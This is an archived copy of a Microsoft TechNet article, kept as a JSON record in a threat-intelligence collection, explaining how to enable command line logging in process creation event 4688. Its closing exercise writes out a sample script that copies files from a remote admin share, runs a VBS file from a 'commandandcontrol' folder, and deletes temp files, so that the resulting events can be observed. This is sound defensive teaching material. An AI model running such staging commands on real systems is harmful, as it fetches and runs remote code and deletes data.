{
	"id": "ff882cf8-efb6-43c3-a563-5074548e0e9f",
	"created_at": "2026-04-06T00:16:52.268381Z",
	"updated_at": "2026-04-10T03:20:23.905618Z",
	"deleted_at": null,
	"sha1_hash": "ec0baeebb52cea061f058e7210737e77789f91a6",
	"title": "Command line process auditing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 439849,
	"plain_text": "Command line process auditing\r\nBy robinharwood\r\nArchived: 2026-04-05 16:45:29 UTC\r\nAuthor: Justin Turner, Senior Support Escalation Engineer with the Windows group\r\nNote\r\nThis content is written by a Microsoft customer support engineer, and is intended for experienced administrators\r\nand systems architects who are looking for deeper technical explanations of features and solutions in Windows\r\nServer 2012 R2 than topics on TechNet usually provide. However, it has not undergone the same editing passes, so\r\nsome of the language may seem less polished than what is typically found on TechNet.\r\nOverview\r\nThe pre-existing process creation audit event ID 4688 will now include audit information for command line\r\nprocesses.\r\nIt will also log SHA1/2 hash of the executable in the Applocker event log\r\nApplication and Services Logs\\Microsoft\\Windows\\AppLocker\r\nYou enable via GPO, but it's disabled by default\r\n\"Include command line in process creation events\"\r\nhttps://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\r\nPage 1 of 6\n\nFigure SEQ Figure \\* ARABIC 16 Event 4688\r\nReview the updated event ID 4688 in REF _Ref366427278 \\h Figure 16. Prior to this update none of the\r\ninformation for Process Command Line gets logged. Because of this additional logging we can now see that not\r\nonly was the wscript.exe process started, but that it was also used to execute a VB script.\r\nConfiguration\r\nTo see the effects of this update, you'll need to enable two policy settings.\r\nYou must have Audit Process Creation auditing enabled to see event ID 4688.\r\nTo enable the Audit Process Creation policy, edit the following group policy:\r\nPolicy location: Computer Configuration \u003e Policies \u003e Windows Settings \u003e Security Settings \u003e Advanced Audit\r\nConfiguration \u003e Detailed Tracking\r\nhttps://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\r\nPage 2 of 6\n\nPolicy Name: Audit Process Creation\r\nSupported on: Windows 7 and above\r\nDescription/Help:\r\nThis security policy setting determines whether the operating system generates audit events when a process is\r\ncreated (starts) and the name of the program or user that created it.\r\nThese audit events can help you understand how a computer is being used and to track user activity.\r\nEvent volume: Low to medium, depending on system usage\r\nDefault: Not configured\r\nIn order to see the additions to event ID 4688, you must enable the new policy setting: Include\r\ncommand line in process creation events\r\nTable SEQ Table \\* ARABIC 19 Command line process policy setting\r\nPolicy\r\nConfiguration\r\nDetails\r\nPath Administrative Templates\\System\\Audit Process Creation\r\nSetting Include command line in process creation events\r\nDefault setting Not Configured (not enabled)\r\nSupported on: ?\r\nhttps://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\r\nPage 3 of 6\n\nPolicy\r\nConfiguration\r\nDetails\r\nDescription\r\nThis policy setting determines what information is logged in security audit events when a\r\nnew process has been created.\r\nThis setting only applies when the Audit Process Creation policy is enabled. If you enable\r\nthis policy setting the command line information for every process will be logged in plain\r\ntext in the security event log as part of the Audit Process Creation event 4688, \"a new\r\nprocess has been created,\" on the workstations and servers on which this policy setting is\r\napplied.\r\nIf you disable or don't configure this policy setting, the process's command line\r\ninformation won't be included in Audit Process Creation events.\r\nDefault: Not configured\r\nNote: When this policy setting is enabled, any user with access to read the security events\r\nwill be able to read the command line arguments for any successfully created process.\r\nCommand line arguments can contain sensitive or private information such as passwords\r\nor user data.\r\nhttps://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\r\nPage 4 of 6\n\nWhen you use Advanced Audit Policy Configuration settings, you need to confirm that these settings aren't\r\noverwritten by basic audit policy settings. Event 4719 is logged when the settings are overwritten.\r\nThe following procedure shows how to prevent conflicts by blocking the application of any basic audit policy\r\nsettings.\r\nTo ensure that Advanced Audit Policy Configuration settings aren't overwritten\r\n1. Open the Group Policy Management console\r\nhttps://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\r\nPage 5 of 6\n\n2. Right-click Default Domain Policy, and then select Edit.\r\n3. Double-click Computer Configuration, double-click Policies, and then double-click Windows Settings.\r\n4. Double-click Security Settings, double-click Local Policies, and then select Security Options.\r\n5. Double-click Audit: Force audit policy subcategory settings (Windows Vista or later) to override audit\r\npolicy category settings, and then select Define this policy setting.\r\n6. Select Enabled, and then select OK.\r\nAdditional Resources\r\nAudit Process Creation\r\nAdvanced Security Audit Policy Step-by-Step Guide\r\nAppLocker: Frequently Asked Questions\r\nTry This: Explore command line process auditing\r\n1. Enable Audit Process Creation events and ensure the Advance Audit Policy configuration isn't\r\noverwritten\r\n2. Create a script that generates some events of interest and execute the script. Observe the events. The script\r\nused to generate the event in the lesson looked like this:\r\nmkdir c:\\systemfiles\\temp\\commandandcontrol\\zone\\fifthward\r\ncopy \\\\192.168.1.254\\c$\\hidden c:\\systemfiles\\temp\\hidden\\commandandcontrol\\zone\\fifthward\r\nstart C:\\systemfiles\\temp\\hidden\\commandandcontrol\\zone\\fifthward\\ntuserrights.vbs\r\ndel c:\\systemfiles\\temp\\*.* /Q\r\n3. Enable the command line process auditing\r\n4. Execute the same script as before and observe the events\r\nSource: https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\r\nhttps://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing"
	],
	"report_names": [
		"command-line-process-auditing"
	],
	"threat_actors": [],
	"ts_created_at": 1775434612,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ec0baeebb52cea061f058e7210737e77789f91a6.pdf",
		"text": "https://archive.orkl.eu/ec0baeebb52cea061f058e7210737e77789f91a6.txt",
		"img": "https://archive.orkl.eu/ec0baeebb52cea061f058e7210737e77789f91a6.jpg"
	}
}